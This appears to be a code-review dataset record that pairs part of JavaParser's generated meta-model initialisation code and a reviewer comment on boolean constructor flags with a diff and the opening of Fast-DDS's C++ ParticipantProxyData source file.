ifStmtMetaModel.getDerivedPropertyMetaModels().add(ifStmtMetaModel.thenBlockPropertyMetaModel);
labeledStmtMetaModel.labelPropertyMetaModel = new PropertyMetaModel(labeledStmtMetaModel, "label", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
labeledStmtMetaModel.getDeclaredPropertyMetaModels().add(labeledStmtMetaModel.labelPropertyMetaModel);
labeledStmtMetaModel.statementPropertyMetaModel = new PropertyMetaModel(labeledStmtMetaModel, "statement", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
labeledStmtMetaModel.getDeclaredPropertyMetaModels().add(labeledStmtMetaModel.statementPropertyMetaModel);
returnStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(returnStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
returnStmtMetaModel.getDeclaredPropertyMetaModels().add(returnStmtMetaModel.expressionPropertyMetaModel);
switchEntryStmtMetaModel.labelPropertyMetaModel = new PropertyMetaModel(switchEntryStmtMetaModel, "label", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
switchEntryStmtMetaModel.getDeclaredPropertyMetaModels().add(switchEntryStmtMetaModel.labelPropertyMetaModel);
switchEntryStmtMetaModel.statementsPropertyMetaModel = new PropertyMetaModel(switchEntryStmtMetaModel, "statements", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, true, false, false);
switchEntryStmtMetaModel.getDeclaredPropertyMetaModels().add(switchEntryStmtMetaModel.statementsPropertyMetaModel);
switchStmtMetaModel.entriesPropertyMetaModel = new PropertyMetaModel(switchStmtMetaModel, "entries", com.github.javaparser.ast.stmt.SwitchEntryStmt.class, Optional.of(switchEntryStmtMetaModel), false, false, true, false, false);
switchStmtMetaModel.getDeclaredPropertyMetaModels().add(switchStmtMetaModel.entriesPropertyMetaModel);
switchStmtMetaModel.selectorPropertyMetaModel = new PropertyMetaModel(switchStmtMetaModel, "selector", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
switchStmtMetaModel.getDeclaredPropertyMetaModels().add(switchStmtMetaModel.selectorPropertyMetaModel);
synchronizedStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(synchronizedStmtMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), false, false, false, false, false);
synchronizedStmtMetaModel.getDeclaredPropertyMetaModels().add(synchronizedStmtMetaModel.bodyPropertyMetaModel);
synchronizedStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(synchronizedStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
synchronizedStmtMetaModel.getDeclaredPropertyMetaModels().add(synchronizedStmtMetaModel.expressionPropertyMetaModel);
throwStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(throwStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
throwStmtMetaModel.getDeclaredPropertyMetaModels().add(throwStmtMetaModel.expressionPropertyMetaModel);
tryStmtMetaModel.catchClausesPropertyMetaModel = new PropertyMetaModel(tryStmtMetaModel, "catchClauses", com.github.javaparser.ast.stmt.CatchClause.class, Optional.of(catchClauseMetaModel), false, false, true, false, false);
tryStmtMetaModel.getDeclaredPropertyMetaModels().add(tryStmtMetaModel.catchClausesPropertyMetaModel);
tryStmtMetaModel.finallyBlockPropertyMetaModel = new PropertyMetaModel(tryStmtMetaModel, "finallyBlock", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), true, false, false, false, false);
tryStmtMetaModel.getDeclaredPropertyMetaModels().add(tryStmtMetaModel.finallyBlockPropertyMetaModel);
tryStmtMetaModel.resourcesPropertyMetaModel = new PropertyMetaModel(tryStmtMetaModel, "resources", com.github.javaparser.ast.expr.VariableDeclarationExpr.class, Optional.of(variableDeclarationExprMetaModel), false, false, true, false, false);
tryStmtMetaModel.getDeclaredPropertyMetaModels().add(tryStmtMetaModel.resourcesPropertyMetaModel);
tryStmtMetaModel.tryBlockPropertyMetaModel = new PropertyMetaModel(tryStmtMetaModel, "tryBlock", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), true, false, false, false, false);
tryStmtMetaModel.getDeclaredPropertyMetaModels().add(tryStmtMetaModel.tryBlockPropertyMetaModel);
localClassDeclarationStmtMetaModel.classDeclarationPropertyMetaModel = new PropertyMetaModel(localClassDeclarationStmtMetaModel, "classDeclaration", com.github.javaparser.ast.body.ClassOrInterfaceDeclaration.class, Optional.of(classOrInterfaceDeclarationMetaModel), false, false, false, false, false);
localClassDeclarationStmtMetaModel.getDeclaredPropertyMetaModels().add(localClassDeclarationStmtMetaModel.classDeclarationPropertyMetaModel);
whileStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(whileStmtMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
whileStmtMetaModel.getDeclaredPropertyMetaModels().add(whileStmtMetaModel.bodyPropertyMetaModel);
whileStmtMetaModel.conditionPropertyMetaModel = new PropertyMetaModel(whileStmtMetaModel, "condition", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
whileStmtMetaModel.getDeclaredPropertyMetaModels().add(whileStmtMetaModel.conditionPropertyMetaModel);
arrayTypeMetaModel.componentTypePropertyMetaModel = new PropertyMetaModel(arrayTypeMetaModel, "componentType", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
arrayTypeMetaModel.getDeclaredPropertyMetaModels().add(arrayTypeMetaModel.componentTypePropertyMetaModel);
classOrInterfaceTypeMetaModel.namePropertyMetaModel = new PropertyMetaModel(classOrInterfaceTypeMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
classOrInterfaceTypeMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceTypeMetaModel.namePropertyMetaModel);
classOrInterfaceTypeMetaModel.scopePropertyMetaModel = new PropertyMetaModel(classOrInterfaceTypeMetaModel, "scope", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), true, false, false, false, false);
classOrInterfaceTypeMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceTypeMetaModel.scopePropertyMetaModel);
classOrInterfaceTypeMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(classOrInterfaceTypeMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
classOrInterfaceTypeMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceTypeMetaModel.typeArgumentsPropertyMetaModel);
classOrInterfaceTypeMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(classOrInterfaceTypeMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
classOrInterfaceTypeMetaModel.getDerivedPropertyMetaModels().add(classOrInterfaceTypeMetaModel.usingDiamondOperatorPropertyMetaModel);
intersectionTypeMetaModel.elementsPropertyMetaModel = new PropertyMetaModel(intersectionTypeMetaModel, "elements", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), false, true, true, false, true);
intersectionTypeMetaModel.getDeclaredPropertyMetaModels().add(intersectionTypeMetaModel.elementsPropertyMetaModel);
primitiveTypeMetaModel.typePropertyMetaModel = new PropertyMetaModel(primitiveTypeMetaModel, "type", com.github.javaparser.ast.type.PrimitiveType.Primitive.class, Optional.empty(), false, false, false, false, false);
primitiveTypeMetaModel.getDeclaredPropertyMetaModels().add(primitiveTypeMetaModel.typePropertyMetaModel);
typeParameterMetaModel.namePropertyMetaModel = new PropertyMetaModel(typeParameterMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
typeParameterMetaModel.getDeclaredPropertyMetaModels().add(typeParameterMetaModel.namePropertyMetaModel);
typeParameterMetaModel.typeBoundPropertyMetaModel = new PropertyMetaModel(typeParameterMetaModel, "typeBound", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, true, false, false);
typeParameterMetaModel.getDeclaredPropertyMetaModels().add(typeParameterMetaModel.typeBoundPropertyMetaModel);
unionTypeMetaModel.elementsPropertyMetaModel = new PropertyMetaModel(unionTypeMetaModel, "elements", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), false, true, true, false, true);
unionTypeMetaModel.getDeclaredPropertyMetaModels().add(unionTypeMetaModel.elementsPropertyMetaModel);
wildcardTypeMetaModel.extendedTypePropertyMetaModel = new PropertyMetaModel(wildcardTypeMetaModel, "extendedType", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), true, false, false, false, false);
wildcardTypeMetaModel.getDeclaredPropertyMetaModels().add(wildcardTypeMetaModel.extendedTypePropertyMetaModel);
wildcardTypeMetaModel.superTypePropertyMetaModel = new PropertyMetaModel(wildcardTypeMetaModel, "superType", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), true, false, false, false, false);
wildcardTypeMetaModel.getDeclaredPropertyMetaModels().add(wildcardTypeMetaModel.superTypePropertyMetaModel);
moduleRequiresStmtMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(moduleRequiresStmtMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
moduleRequiresStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleRequiresStmtMetaModel.modifiersPropertyMetaModel);
moduleRequiresStmtMetaModel.namePropertyMetaModel = new PropertyMetaModel(moduleRequiresStmtMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
moduleRequiresStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleRequiresStmtMetaModel.namePropertyMetaModel);
moduleExportsStmtMetaModel.moduleNamesPropertyMetaModel = new PropertyMetaModel(moduleExportsStmtMetaModel, "moduleNames", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, true, false, false);
moduleExportsStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleExportsStmtMetaModel.moduleNamesPropertyMetaModel);
moduleExportsStmtMetaModel.namePropertyMetaModel = new PropertyMetaModel(moduleExportsStmtMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
moduleExportsStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleExportsStmtMetaModel.namePropertyMetaModel);
moduleProvidesStmtMetaModel.typePropertyMetaModel = new PropertyMetaModel(moduleProvidesStmtMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
moduleProvidesStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleProvidesStmtMetaModel.typePropertyMetaModel);
moduleProvidesStmtMetaModel.withTypesPropertyMetaModel = new PropertyMetaModel(moduleProvidesStmtMetaModel, "withTypes", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, true, false, false);
moduleProvidesStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleProvidesStmtMetaModel.withTypesPropertyMetaModel);
moduleUsesStmtMetaModel.typePropertyMetaModel = new PropertyMetaModel(moduleUsesStmtMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
moduleUsesStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleUsesStmtMetaModel.typePropertyMetaModel);
moduleOpensStmtMetaModel.moduleNamesPropertyMetaModel = new PropertyMetaModel(moduleOpensStmtMetaModel, "moduleNames", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, true, false, false);
moduleOpensStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleOpensStmtMetaModel.moduleNamesPropertyMetaModel);
moduleOpensStmtMetaModel.namePropertyMetaModel = new PropertyMetaModel(moduleOpensStmtMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
moduleOpensStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleOpensStmtMetaModel.namePropertyMetaModel);
}
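/**
 * Looks up the meta model for a given AST node class by comparing simple class names.
 * A minimal usage sketch (hedged: getAllPropertyMetaModels() and getName() are assumed from the
 * surrounding generated meta-model API rather than shown in this file):
 *
 *   Optional&lt;BaseNodeMetaModel&gt; mm =
 *       getNodeMetaModel(com.github.javaparser.ast.body.MethodDeclaration.class);
 *   mm.ifPresent(m -&gt; m.getAllPropertyMetaModels()
 *                       .forEach(p -&gt; System.out.println(p.getName())));
 *
 * The lookup itself is a linear scan over the nodeMetaModels list maintained by this class.
 */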
public static Optional<BaseNodeMetaModel> getNodeMetaModel(Class<? extends Node> c) {
for (BaseNodeMetaModel nodeMetaModel : nodeMetaModels) {
if (nodeMetaModel.getTypeNameGenerified().equals(c.getSimpleName())) {
return Optional.of(nodeMetaModel);
}
}
return Optional.empty();
}
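// The base meta model instances below are declared before the more specific ones so that each
// constructor can be handed its parent meta model. The Optional argument appears to be the
// meta model of the AST super class (e.g. BodyDeclaration extends Node), with NodeMetaModel
// itself, as the root of the hierarchy, taking Optional.empty().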
public static final NodeMetaModel nodeMetaModel = new NodeMetaModel(Optional.empty());
public static final BodyDeclarationMetaModel bodyDeclarationMetaModel = new BodyDeclarationMetaModel(Optional.of(nodeMetaModel));
public static final CallableDeclarationMetaModel callableDeclarationMetaModel = new CallableDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final StatementMetaModel statementMetaModel = new StatementMetaModel(Optional.of(nodeMetaModel));
public static final ExpressionMetaModel expressionMetaModel = new ExpressionMetaModel(Optional.of(nodeMetaModel));
public static final TypeMetaModel typeMetaModel = new TypeMetaModel(Optional.of(nodeMetaModel));
public static final AnnotationExprMetaModel annotationExprMetaModel = new AnnotationExprMetaModel(Optional.of(expressionMetaModel));
public static final TypeDeclarationMetaModel typeDeclarationMetaModel = new TypeDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final ReferenceTypeMetaModel referenceTypeMetaModel = new ReferenceTypeMetaModel(Optional.of(typeMetaModel));
public static final LiteralExprMetaModel literalExprMetaModel = new LiteralExprMetaModel(Optional.of(expressionMetaModel));
public static final LiteralStringValueExprMetaModel literalStringValueExprMetaModel = new LiteralStringValueExprMetaModel(Optional.of(literalExprMetaModel));
public static final StringLiteralExprMetaModel stringLiteralExprMetaModel = new StringLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final ModuleDeclarationMetaModel moduleDeclarationMetaModel = new ModuleDeclarationMetaModel(Optional.of(nodeMetaModel));
public static final ModuleStmtMetaModel moduleStmtMetaModel = new ModuleStmtMetaModel(Optional.of(nodeMetaModel));
public static final ArrayCreationLevelMetaModel arrayCreationLevelMetaModel = new ArrayCreationLevelMetaModel(Optional.of(nodeMetaModel));
public static final CompilationUnitMetaModel compilationUnitMetaModel = new CompilationUnitMetaModel(Optional.of(nodeMetaModel));
public static final PackageDeclarationMetaModel packageDeclarationMetaModel = new PackageDeclarationMetaModel(Optional.of(nodeMetaModel));
public static final AnnotationDeclarationMetaModel annotationDeclarationMetaModel = new AnnotationDeclarationMetaModel(Optional.of(typeDeclarationMetaModel));
public static final AnnotationMemberDeclarationMetaModel annotationMemberDeclarationMetaModel = new AnnotationMemberDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final ClassOrInterfaceDeclarationMetaModel classOrInterfaceDeclarationMetaModel = new ClassOrInterfaceDeclarationMetaModel(Optional.of(typeDeclarationMetaModel));
public static final ConstructorDeclarationMetaModel constructorDeclarationMetaModel = new ConstructorDeclarationMetaModel(Optional.of(callableDeclarationMetaModel));
public static final EmptyMemberDeclarationMetaModel emptyMemberDeclarationMetaModel = new EmptyMemberDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final EnumConstantDeclarationMetaModel enumConstantDeclarationMetaModel = new EnumConstantDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final EnumDeclarationMetaModel enumDeclarationMetaModel = new EnumDeclarationMetaModel(Optional.of(typeDeclarationMetaModel));
public static final FieldDeclarationMetaModel fieldDeclarationMetaModel = new FieldDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final InitializerDeclarationMetaModel initializerDeclarationMetaModel = new InitializerDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final MethodDeclarationMetaModel methodDeclarationMetaModel = new MethodDeclarationMetaModel(Optional.of(callableDeclarationMetaModel));
public static final ParameterMetaModel parameterMetaModel = new ParameterMetaModel(Optional.of(nodeMetaModel));
public static final VariableDeclaratorMetaModel variableDeclaratorMetaModel = new VariableDeclaratorMetaModel(Optional.of(nodeMetaModel));
public static final CommentMetaModel commentMetaModel = new CommentMetaModel(Optional.of(nodeMetaModel));
public static final BlockCommentMetaModel blockCommentMetaModel = new BlockCommentMetaModel(Optional.of(commentMetaModel));
public static final JavadocCommentMetaModel javadocCommentMetaModel = new JavadocCommentMetaModel(Optional.of(commentMetaModel));
public static final LineCommentMetaModel lineCommentMetaModel = new LineCommentMetaModel(Optional.of(commentMetaModel));
public static final ArrayAccessExprMetaModel arrayAccessExprMetaModel = new ArrayAccessExprMetaModel(Optional.of(expressionMetaModel));
public static final ArrayCreationExprMetaModel arrayCreationExprMetaModel = new ArrayCreationExprMetaModel(Optional.of(expressionMetaModel));
public static final ArrayInitializerExprMetaModel arrayInitializerExprMetaModel = new ArrayInitializerExprMetaModel(Optional.of(expressionMetaModel));
public static final AssignExprMetaModel assignExprMetaModel = new AssignExprMetaModel(Optional.of(expressionMetaModel));
public static final BinaryExprMetaModel binaryExprMetaModel = new BinaryExprMetaModel(Optional.of(expressionMetaModel));
public static final BooleanLiteralExprMetaModel booleanLiteralExprMetaModel = new BooleanLiteralExprMetaModel(Optional.of(literalExprMetaModel));
public static final CastExprMetaModel castExprMetaModel = new CastExprMetaModel(Optional.of(expressionMetaModel));
public static final CharLiteralExprMetaModel charLiteralExprMetaModel = new CharLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final ClassExprMetaModel classExprMetaModel = new ClassExprMetaModel(Optional.of(expressionMetaModel));
public static final ConditionalExprMetaModel conditionalExprMetaModel = new ConditionalExprMetaModel(Optional.of(expressionMetaModel));
public static final DoubleLiteralExprMetaModel doubleLiteralExprMetaModel = new DoubleLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final EnclosedExprMetaModel enclosedExprMetaModel = new EnclosedExprMetaModel(Optional.of(expressionMetaModel));
public static final FieldAccessExprMetaModel fieldAccessExprMetaModel = new FieldAccessExprMetaModel(Optional.of(expressionMetaModel));
public static final InstanceOfExprMetaModel instanceOfExprMetaModel = new InstanceOfExprMetaModel(Optional.of(expressionMetaModel));
public static final IntegerLiteralExprMetaModel integerLiteralExprMetaModel = new IntegerLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final LambdaExprMetaModel lambdaExprMetaModel = new LambdaExprMetaModel(Optional.of(expressionMetaModel));
public static final LongLiteralExprMetaModel longLiteralExprMetaModel = new LongLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final MarkerAnnotationExprMetaModel markerAnnotationExprMetaModel = new MarkerAnnotationExprMetaModel(Optional.of(annotationExprMetaModel));
public static final MemberValuePairMetaModel memberValuePairMetaModel = new MemberValuePairMetaModel(Optional.of(nodeMetaModel));
public static final MethodCallExprMetaModel methodCallExprMetaModel = new MethodCallExprMetaModel(Optional.of(expressionMetaModel));
public static final MethodReferenceExprMetaModel methodReferenceExprMetaModel = new MethodReferenceExprMetaModel(Optional.of(expressionMetaModel));
public static final NameExprMetaModel nameExprMetaModel = new NameExprMetaModel(Optional.of(expressionMetaModel));
public static final NameMetaModel nameMetaModel = new NameMetaModel(Optional.of(nodeMetaModel));
public static final NormalAnnotationExprMetaModel normalAnnotationExprMetaModel = new NormalAnnotationExprMetaModel(Optional.of(annotationExprMetaModel));
public static final NullLiteralExprMetaModel nullLiteralExprMetaModel = new NullLiteralExprMetaModel(Optional.of(literalExprMetaModel));
public static final ObjectCreationExprMetaModel objectCreationExprMetaModel = new ObjectCreationExprMetaModel(Optional.of(expressionMetaModel));
public static final SimpleNameMetaModel simpleNameMetaModel = new SimpleNameMetaModel(Optional.of(nodeMetaModel));
public static final SingleMemberAnnotationExprMetaModel singleMemberAnnotationExprMetaModel = new SingleMemberAnnotationExprMetaModel(Optional.of(annotationExprMetaModel));
public static final SuperExprMetaModel superExprMetaModel = new SuperExprMetaModel(Optional.of(expressionMetaModel));
public static final ThisExprMetaModel thisExprMetaModel = new ThisExprMetaModel(Optional.of(expressionMetaModel));
public static final TypeExprMetaModel typeExprMetaModel = new TypeExprMetaModel(Optional.of(expressionMetaModel));
public static final UnaryExprMetaModel unaryExprMetaModel = new UnaryExprMetaModel(Optional.of(expressionMetaModel));
public static final VariableDeclarationExprMetaModel variableDeclarationExprMetaModel = new VariableDeclarationExprMetaModel(Optional.of(expressionMetaModel));
public static final ImportDeclarationMetaModel importDeclarationMetaModel = new ImportDeclarationMetaModel(Optional.of(nodeMetaModel));
public static final AssertStmtMetaModel assertStmtMetaModel = new AssertStmtMetaModel(Optional.of(statementMetaModel));
public static final BlockStmtMetaModel blockStmtMetaModel = new BlockStmtMetaModel(Optional.of(statementMetaModel));
public static final BreakStmtMetaModel breakStmtMetaModel = new BreakStmtMetaModel(Optional.of(statementMetaModel));
public static final CatchClauseMetaModel catchClauseMetaModel = new CatchClauseMetaModel(Optional.of(nodeMetaModel));
public static final ContinueStmtMetaModel continueStmtMetaModel = new ContinueStmtMetaModel(Optional.of(statementMetaModel));
public static final DoStmtMetaModel doStmtMetaModel = new DoStmtMetaModel(Optional.of(statementMetaModel));
public static final EmptyStmtMetaModel emptyStmtMetaModel = new EmptyStmtMetaModel(Optional.of(statementMetaModel));
public static final ExplicitConstructorInvocationStmtMetaModel explicitConstructorInvocationStmtMetaModel = new ExplicitConstructorInvocationStmtMetaModel(Optional.of(statementMetaModel));
public static final ExpressionStmtMetaModel expressionStmtMetaModel = new ExpressionStmtMetaModel(Optional.of(statementMetaModel));
public static final ForeachStmtMetaModel foreachStmtMetaModel = new ForeachStmtMetaModel(Optional.of(statementMetaModel));
public static final ForStmtMetaModel forStmtMetaModel = new ForStmtMetaModel(Optional.of(statementMetaModel));
public static final IfStmtMetaModel ifStmtMetaModel = new IfStmtMetaModel(Optional.of(statementMetaModel));
public static final LabeledStmtMetaModel labeledStmtMetaModel = new LabeledStmtMetaModel(Optional.of(statementMetaModel));
public static final ReturnStmtMetaModel returnStmtMetaModel = new ReturnStmtMetaModel(Optional.of(statementMetaModel));
public static final SwitchEntryStmtMetaModel switchEntryStmtMetaModel = new SwitchEntryStmtMetaModel(Optional.of(statementMetaModel));
public static final SwitchStmtMetaModel switchStmtMetaModel = new SwitchStmtMetaModel(Optional.of(statementMetaModel));
public static final SynchronizedStmtMetaModel synchronizedStmtMetaModel = new SynchronizedStmtMetaModel(Optional.of(statementMetaModel));
public static final ThrowStmtMetaModel throwStmtMetaModel = new ThrowStmtMetaModel(Optional.of(statementMetaModel));
public static final TryStmtMetaModel tryStmtMetaModel = new TryStmtMetaModel(Optional.of(statementMetaModel));
public static final LocalClassDeclarationStmtMetaModel localClassDeclarationStmtMetaModel = new LocalClassDeclarationStmtMetaModel(Optional.of(statementMetaModel));
public static final WhileStmtMetaModel whileStmtMetaModel = new WhileStmtMetaModel(Optional.of(statementMetaModel));
public static final ArrayTypeMetaModel arrayTypeMetaModel = new ArrayTypeMetaModel(Optional.of(referenceTypeMetaModel));
public static final ClassOrInterfaceTypeMetaModel classOrInterfaceTypeMetaModel = new ClassOrInterfaceTypeMetaModel(Optional.of(referenceTypeMetaModel));
public static final IntersectionTypeMetaModel intersectionTypeMetaModel = new IntersectionTypeMetaModel(Optional.of(typeMetaModel));
public static final PrimitiveTypeMetaModel primitiveTypeMetaModel = new PrimitiveTypeMetaModel(Optional.of(typeMetaModel));
public static final TypeParameterMetaModel typeParameterMetaModel = new TypeParameterMetaModel(Optional.of(referenceTypeMetaModel));
public static final UnionTypeMetaModel unionTypeMetaModel = new UnionTypeMetaModel(Optional.of(typeMetaModel));
public static final UnknownTypeMetaModel unknownTypeMetaModel = new UnknownTypeMetaModel(Optional.of(typeMetaModel));
public static final VoidTypeMetaModel voidTypeMetaModel = new VoidTypeMetaModel(Optional.of(typeMetaModel));
public static final WildcardTypeMetaModel wildcardTypeMetaModel = new WildcardTypeMetaModel(Optional.of(typeMetaModel));
public static final ModuleRequiresStmtMetaModel moduleRequiresStmtMetaModel = new ModuleRequiresStmtMetaModel(Optional.of(moduleStmtMetaModel));
public static final ModuleExportsStmtMetaModel moduleExportsStmtMetaModel = new ModuleExportsStmtMetaModel(Optional.of(moduleStmtMetaModel));
public static final ModuleProvidesStmtMetaModel moduleProvidesStmtMetaModel = new ModuleProvidesStmtMetaModel(Optional.of(moduleStmtMetaModel));
public static final ModuleUsesStmtMetaModel moduleUsesStmtMetaModel = new ModuleUsesStmtMetaModel(Optional.of(moduleStmtMetaModel));
public static final ModuleOpensStmtMetaModel moduleOpensStmtMetaModel = new ModuleOpensStmtMetaModel(Optional.of(moduleStmtMetaModel));
static {
initializeNodeMetaModels();
initializePropertyMetaModels();
initializeConstructorParameters();
}
}
| 1 | 10,997 | Looking at this list of boolean flags I wonder if we should create enums for all of these options, so that the code becomes much more readable | javaparser-javaparser | java |
@@ -29,8 +29,11 @@
#include <fastrtps/qos/QosPolicies.h>
#include <fastrtps/utils/TimeConversion.h>
+#include <rtps/builtin/data/ProxyHashTables.hpp>
+
#include <mutex>
#include <chrono>
+#include <unordered_set>
using namespace eprosima::fastrtps;
| 1 | // Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima).
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @file ParticipantProxyData.cpp
*
*/
#include <fastrtps_deprecated/participant/ParticipantImpl.h>
#include <fastdds/rtps/builtin/data/ParticipantProxyData.h>
#include <fastdds/rtps/builtin/data/WriterProxyData.h>
#include <fastdds/rtps/builtin/data/ReaderProxyData.h>
#include <fastdds/rtps/builtin/discovery/participant/PDPSimple.h>
#include <fastdds/rtps/resources/TimedEvent.h>
#include <fastdds/rtps/builtin/BuiltinProtocols.h>
#include <fastdds/rtps/network/NetworkFactory.h>
#include <fastrtps/log/Log.h>
#include <fastrtps/qos/QosPolicies.h>
#include <fastrtps/utils/TimeConversion.h>
#include <mutex>
#include <chrono>
using namespace eprosima::fastrtps;
namespace eprosima {
namespace fastrtps {
namespace rtps {
ParticipantProxyData::ParticipantProxyData(
const RTPSParticipantAllocationAttributes& allocation)
: m_protocolVersion(c_ProtocolVersion)
, m_VendorId(c_VendorId_Unknown)
, m_expectsInlineQos(false)
, m_availableBuiltinEndpoints(0)
, metatraffic_locators(allocation.locators.max_unicast_locators, allocation.locators.max_multicast_locators)
, default_locators(allocation.locators.max_unicast_locators, allocation.locators.max_multicast_locators)
#if HAVE_SECURITY
, security_attributes_(0UL)
, plugin_security_attributes_(0UL)
#endif
, isAlive(false)
, lease_duration_event(nullptr)
, should_check_lease_duration(false)
, m_readers(allocation.readers)
, m_writers(allocation.writers)
{
}
ParticipantProxyData::ParticipantProxyData(
const ParticipantProxyData& pdata)
: m_protocolVersion(pdata.m_protocolVersion)
, m_guid(pdata.m_guid)
, m_VendorId(pdata.m_VendorId)
, m_expectsInlineQos(pdata.m_expectsInlineQos)
, m_availableBuiltinEndpoints(pdata.m_availableBuiltinEndpoints)
, metatraffic_locators(pdata.metatraffic_locators)
, default_locators(pdata.default_locators)
, m_participantName(pdata.m_participantName)
, m_key(pdata.m_key)
, m_leaseDuration(pdata.m_leaseDuration)
#if HAVE_SECURITY
, identity_token_(pdata.identity_token_)
, permissions_token_(pdata.permissions_token_)
, security_attributes_(pdata.security_attributes_)
, plugin_security_attributes_(pdata.plugin_security_attributes_)
#endif
, isAlive(pdata.isAlive)
, m_properties(pdata.m_properties)
, m_userData(pdata.m_userData)
, lease_duration_event(nullptr)
, should_check_lease_duration(false)
, lease_duration_(std::chrono::microseconds(TimeConv::Duration_t2MicroSecondsInt64(pdata.m_leaseDuration)))
// This method is only called from SecurityManager when a new participant is discovered and the
// corresponding DiscoveredParticipantInfo struct is created. Only participant info is used,
// so there is no need to copy m_readers and m_writers
{
}
ParticipantProxyData::~ParticipantProxyData()
{
logInfo(RTPS_PARTICIPANT, m_guid);
for (ReaderProxyData* it : m_readers)
{
delete it;
}
for (WriterProxyData* it : m_writers)
{
delete it;
}
if (lease_duration_event != nullptr)
{
delete lease_duration_event;
}
}
bool ParticipantProxyData::writeToCDRMessage(
CDRMessage_t* msg,
bool write_encapsulation)
{
if (write_encapsulation)
{
if (!ParameterList::writeEncapsulationToCDRMsg(msg))
{
return false;
}
}
{
ParameterProtocolVersion_t p(fastdds::dds::PID_PROTOCOL_VERSION, 4);
p.protocolVersion = this->m_protocolVersion;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
